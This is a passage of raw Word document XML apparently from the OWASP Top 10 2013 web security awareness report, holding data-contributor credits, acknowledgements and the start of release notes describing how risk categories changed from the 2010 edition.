    <w:p w14:paraId="70DD6A3B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hyperlink r:id="rId5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inde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–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5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Statistics</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79414BC5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hyperlink r:id="rId5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ofttek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–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5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Statistics</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5904CBF6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="241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hyperlink r:id="rId5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rustwave,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piderLab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–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Statistics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>  (See page 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28117EE6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hyperlink r:id="rId5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eracod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–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5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Statistics</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="423E11ED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hyperlink r:id="rId5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WhiteH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c.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–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6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Statistics</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="624278CD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="384" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="92"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>We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would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like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to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thank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everyone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who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contributed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to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previous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B214A28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vers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10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Withou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tributions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t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3726B9C6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323232"/>
          <w:w w:val="86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>wouldn’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b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wha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oday.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We’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lso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lik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o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ank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os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who</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B1A137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contribut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ignifica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structi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m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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3082B557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review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pda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10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217395D6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="384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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Adam Baso (Wikimedia Foundation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A47F44D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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Mike Boberski (Booz Allen Hamilton)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65742BB3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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Torsten Gigler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BD6A4A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Neil Smithline – (MorphoTrust USA) For producing the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A360D0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="545"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="92"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>wiki version of the Top 10, and also providing feedback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C5F3C9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="384" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>An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finally,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we’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lik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o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ank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dvanc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ll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ranslator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out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C265942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the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wi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ransla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lea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10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to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163B20C1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numerou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iffere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languages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elp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k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WASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7564559D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To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10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o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cessibl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ti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lanet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25356F82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5545" w:space="0"/>
            <w:col w:w="5255" w:space="0"/>
          </w:cols>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E03914A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="4"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="39E98D2A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="433"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="24A848F5">
          <v:shape id="imagerId63" o:spid="_x0000_s2900" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:124pt;height:96pt;z-index:-252035584;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId63" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6703988C">
          <v:shapetype id="_x0000_m2899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0001FE2">
          <v:shape id="_x0000_s2898" type="#_x0000_m2899" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-25205094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6FD3DF97">
          <v:shapetype id="_x0000_m2897" coordsize="54000,3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E35906E">
          <v:shape id="_x0000_s2896" type="#_x0000_m2897" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:90pt;width:540pt;height:30pt;z-index:-252049920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57F28714">
          <v:shapetype id="_x0000_m2895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E34F02C">
          <v:shape id="_x0000_s2894" type="#_x0000_m2895" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:119.5pt;width:541pt;height:1pt;z-index:25163827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FEE7CA9">
          <v:shapetype id="_x0000_m2893" coordsize="200,3608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B312D79">
          <v:shape id="_x0000_s2892" type="#_x0000_m2893" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:89pt;width:2pt;height:360.8pt;z-index:25163929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8AA38C6">
          <v:shapetype id="_x0000_m2891" coordsize="200,3608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550D826">
          <v:shape id="_x0000_s2890" type="#_x0000_m2891" style="position:absolute;left:0;text-align:left;margin-left:539.5pt;margin-top:89pt;width:2pt;height:360.8pt;z-index:25164032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98109F0">
          <v:shapetype id="_x0000_m2889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66717BF">
          <v:shape id="_x0000_s2888" type="#_x0000_m2889" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:89.5pt;width:541pt;height:1pt;z-index:25164134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C06F93D">
          <v:shapetype id="_x0000_m2887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29486EE">
          <v:shape id="_x0000_s2886" type="#_x0000_m2887" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:448.3pt;width:541pt;height:1pt;z-index:25164236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77093658">
          <v:shapetype id="polygon54" o:spid="_x0000_m2885" coordsize="192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776BEA9">
          <v:shape id="_x0000_s2884" type="#polygon54" style="position:absolute;left:0;text-align:left;margin-left:232.2pt;margin-top:297.2pt;width:192.7pt;height:.6pt;z-index:-252048896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617D3A6D">
          <v:shapetype id="polygon68" o:spid="_x0000_m2883" coordsize="1362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C374A0E">
          <v:shape id="WS_polygon68" o:spid="_x0000_s2882" type="#polygon68" style="position:absolute;left:0;text-align:left;margin-left:268.55pt;margin-top:327.2pt;width:136.2pt;height:.6pt;z-index:-252047872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1020C87D">
          <v:shapetype id="_x0000_m2881" coordsize="1924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4B82F3D">
          <v:shape id="_x0000_s2880" type="#_x0000_m2881" style="position:absolute;left:0;text-align:left;margin-left:71.6pt;margin-top:400.4pt;width:192.45pt;height:.6pt;z-index:-252046848;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="black" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="38F90A1B">
          <v:shapetype id="polygon109" o:spid="_x0000_m2879" coordsize="27000,277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5058A92">
          <v:shape id="WS_polygon109" o:spid="_x0000_s2878" type="#polygon109" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:452.3pt;width:270pt;height:27.7pt;z-index:-252045824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00A1D7F0">
          <v:shapetype id="polygon110" o:spid="_x0000_m2877" coordsize="27000,277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BE5BDF2">
          <v:shape id="WS_polygon110" o:spid="_x0000_s2876" type="#polygon110" style="position:absolute;left:0;text-align:left;margin-left:270pt;margin-top:452.3pt;width:270pt;height:27.7pt;z-index:-252044800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17B4C9C1">
          <v:shapetype id="polygon111" o:spid="_x0000_m2875" coordsize="27000,218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DACB214">
          <v:shape id="WS_polygon111" o:spid="_x0000_s2874" type="#polygon111" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:589.1pt;width:270pt;height:21.8pt;z-index:-252043776;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#d3cbb6" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="35386F40">
          <v:shapetype id="polygon112" o:spid="_x0000_m2873" coordsize="27000,218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110B6C0">
          <v:shape id="WS_polygon112" o:spid="_x0000_s2872" type="#polygon112" style="position:absolute;left:0;text-align:left;margin-left:270pt;margin-top:589.1pt;width:270pt;height:21.8pt;z-index:-252042752;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#d3cbb6" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="093FCF0D">
          <v:shapetype id="polygon113" o:spid="_x0000_m2871" coordsize="27000,218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FF6DD64">
          <v:shape id="WS_polygon113" o:spid="_x0000_s2870" type="#polygon113" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:610.9pt;width:270pt;height:21.8pt;z-index:-252041728;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#d3cbb6" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6C9843F4">
          <v:shapetype id="polygon114" o:spid="_x0000_m2869" coordsize="27000,218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873E6F2">
          <v:shape id="WS_polygon114" o:spid="_x0000_s2868" type="#polygon114" style="position:absolute;left:0;text-align:left;margin-left:270pt;margin-top:610.9pt;width:270pt;height:21.8pt;z-index:-252040704;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#d3cbb6" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="016F9CC6">
          <v:shapetype id="polygon115" o:spid="_x0000_m2867" coordsize="27000,218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DDF6A7">
          <v:shape id="WS_polygon115" o:spid="_x0000_s2866" type="#polygon115" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:654.55pt;width:270pt;height:21.8pt;z-index:-252039680;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#d3cbb6" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2B4C2A47">
          <v:shapetype id="polygon116" o:spid="_x0000_m2865" coordsize="27000,218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3FEC152">
          <v:shape id="WS_polygon116" o:spid="_x0000_s2864" type="#polygon116" style="position:absolute;left:0;text-align:left;margin-left:270pt;margin-top:654.55pt;width:270pt;height:21.8pt;z-index:-252038656;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#d3cbb6" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7F4B289C">
          <v:shapetype id="polygon117" o:spid="_x0000_m2863" coordsize="27000,218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161EB9D">
          <v:shape id="WS_polygon117" o:spid="_x0000_s2862" type="#polygon117" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:698.15pt;width:270pt;height:21.8pt;z-index:-252037632;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#e69ca4" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2498965E">
          <v:shapetype id="polygon118" o:spid="_x0000_m2861" coordsize="27000,218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CD4DB3">
          <v:shape id="WS_polygon118" o:spid="_x0000_s2860" type="#polygon118" style="position:absolute;left:0;text-align:left;margin-left:270pt;margin-top:698.15pt;width:270pt;height:21.8pt;z-index:-252036608;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#e69ca4" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3B2A77D3">
          <v:shapetype id="polygon119" o:spid="_x0000_m2859" coordsize="200,2696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743A6CA">
          <v:shape id="WS_polygon119" o:spid="_x0000_s2858" type="#polygon119" style="position:absolute;left:0;text-align:left;margin-left:269.5pt;margin-top:451.3pt;width:2pt;height:269.65pt;z-index:25120614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9628055">
          <v:shapetype id="polygon120" o:spid="_x0000_m2857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2E1F467">
          <v:shape id="WS_polygon120" o:spid="_x0000_s2856" type="#polygon120" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:479.5pt;width:541pt;height:1pt;z-index:25120716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7169DDBF">
          <v:shapetype id="polygon121" o:spid="_x0000_m2855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56CC96C">
          <v:shape id="WS_polygon121" o:spid="_x0000_s2854" type="#polygon121" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:501.35pt;width:541pt;height:1pt;z-index:25120819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3977F067">
          <v:shapetype id="polygon122" o:spid="_x0000_m2853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94E73C9">
          <v:shape id="WS_polygon122" o:spid="_x0000_s2852" type="#polygon122" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:523.15pt;width:541pt;height:1pt;z-index:25120921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1BCD416">
          <v:shapetype id="polygon123" o:spid="_x0000_m2851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42149AE">
          <v:shape id="WS_polygon123" o:spid="_x0000_s2850" type="#polygon123" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:544.95pt;width:541pt;height:1pt;z-index:25121024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C144B17">
          <v:shapetype id="polygon124" o:spid="_x0000_m2849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19171A5">
          <v:shape id="WS_polygon124" o:spid="_x0000_s2848" type="#polygon124" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:566.8pt;width:541pt;height:1pt;z-index:25121126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3C19AEF">
          <v:shapetype id="polygon125" o:spid="_x0000_m2847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561B46B">
          <v:shape id="WS_polygon125" o:spid="_x0000_s2846" type="#polygon125" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:588.6pt;width:541pt;height:1pt;z-index:25121228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0532E6F">
          <v:shapetype id="_x0000_m2845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292FB0">
          <v:shape id="WS_polygon126" o:spid="_x0000_s2844" type="#_x0000_m2845" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:610.4pt;width:541pt;height:1pt;z-index:25121331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31176B33">
          <v:shapetype id="polygon127" o:spid="_x0000_m2843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A784B88">
          <v:shape id="WS_polygon127" o:spid="_x0000_s2842" type="#polygon127" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:632.2pt;width:541pt;height:1pt;z-index:25121433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3F68F9A">
          <v:shapetype id="polygon128" o:spid="_x0000_m2841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4EFCFB3">
          <v:shape id="WS_polygon128" o:spid="_x0000_s2840" type="#polygon128" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:654.05pt;width:541pt;height:1pt;z-index:25121536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3EFFEE2E">
          <v:shapetype id="polygon129" o:spid="_x0000_m2839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61209E">
          <v:shape id="WS_polygon129" o:spid="_x0000_s2838" type="#polygon129" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:675.85pt;width:541pt;height:1pt;z-index:25121638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582D394B">
          <v:shapetype id="polygon130" o:spid="_x0000_m2837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FBE1AA">
          <v:shape id="WS_polygon130" o:spid="_x0000_s2836" type="#polygon130" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:697.65pt;width:541pt;height:1pt;z-index:25121740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F0D146B">
          <v:shapetype id="polygon131" o:spid="_x0000_m2835" coordsize="200,2696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3D528A9">
          <v:shape id="WS_polygon131" o:spid="_x0000_s2834" type="#polygon131" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:451.3pt;width:2pt;height:269.65pt;z-index:25121843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385A26D">
          <v:shapetype id="_x0000_m2833" coordsize="200,2696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8B510ED">
          <v:shape id="WS_polygon132" o:spid="_x0000_s2832" type="#_x0000_m2833" style="position:absolute;left:0;text-align:left;margin-left:539.5pt;margin-top:451.3pt;width:2pt;height:269.65pt;z-index:25121945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5557526D">
          <v:shapetype id="polygon133" o:spid="_x0000_m2831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2020308">
          <v:shape id="WS_polygon133" o:spid="_x0000_s2830" type="#polygon133" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:451.8pt;width:541pt;height:1pt;z-index:251220480;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#4e8542" strokeweight="1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RN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD95076" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="433"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF08E4A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Release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Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8F9B67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19499530" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36ED12F4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FFCDD2D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62BDEC93" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="35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What Changed From 2010 to 2013?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B29AC74" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="421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The threat landscape for applications security constantly changes. Key factors in this evolution are advances made by attackers,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C9AAF0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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>the release of new technologies with new weaknesses as well as more built in defenses, and the deployment of increasingly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAFC05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complex systems. To keep pace, we periodically update the OWASP Top 10. In this 2013 release, we made the following changes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507356F9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73DC684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1)     Broken Authentication and Session Management moved up in prevalence based on our data set. We believe this is probably</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6999FD47" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>because this area is being looked at harder, not because these issues are actually more prevalent. This caused Risks A2 and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53968CB2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240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A3 to switch places.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A064D3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1148DC87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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2)     Cross-Site Request Forgery (CSRF) moved down in prevalence based on our data set from 2010-A5 to 2013-A8. We believe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3340F3C5" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>this is because CSRF has been in the OWASP Top 10 for 6 years, and organizations and framework developers have focused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD4A667" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240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on it enough to significantly reduce the number of CSRF vulnerabilities in real world applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4200B574" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="303DFC88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3)     We broadened Failure to Restrict URL Access from the 2010 OWASP Top 10 to be more inclusive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550DBBA1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="384" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2010-A8: Failure to Restrict URL Access is now 2013-A7: Missing Function Level Access Control – to cover all of function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE4019C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>level access control. There are many ways to specify which function is being accessed, not just the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E6349" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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4)     We merged and broadened 2010-A7 &amp; 2010-A9 to CREATE: 2013-A6: Sensitive Data Exposure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D3C866" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="384" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>This new category was created by merging 2010-A7 – Insecure Cryptographic Storage  &amp; 2010-A9 - Insufficient Transport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BBEBF1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="241" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
